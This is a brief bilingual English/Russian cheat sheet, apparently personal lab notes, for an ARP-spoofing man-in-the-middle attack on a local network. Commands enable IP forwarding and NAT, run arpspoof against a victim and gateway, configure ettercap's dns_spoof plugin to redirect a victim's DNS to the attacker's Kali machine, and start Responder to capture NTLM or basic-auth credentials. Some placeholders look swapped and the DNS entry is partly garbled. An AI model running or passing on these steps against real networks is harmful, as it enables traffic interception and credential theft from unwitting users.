Arp spoofing

Pre install

Turn on ip forward

$ echo 1 > /proc/sys/net/ipv4/ip_forward

Iptables

$ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

start spoof

$ arpspoof -i eth0 -t [victim ip gateway] -r [victim ip]

Spoofing with DNS poisoning

1. В /etc/ettercap/etter.dns прописать в конце

• A 10.117.51.103 Где IP - IP kali

1. ettercap -g (Открывайте GUI).

2. Добавляешь gateway (10.117.51.1), добавляешь Victim (10.117.51.100)

3. Заходишь в Настройки > Plugins и включаешь плагин "dns_spoof"

4. Поднимаешь Responder (флаги -wF для NTLM или -b для бейсика)

5. Начинаешь mitm атаку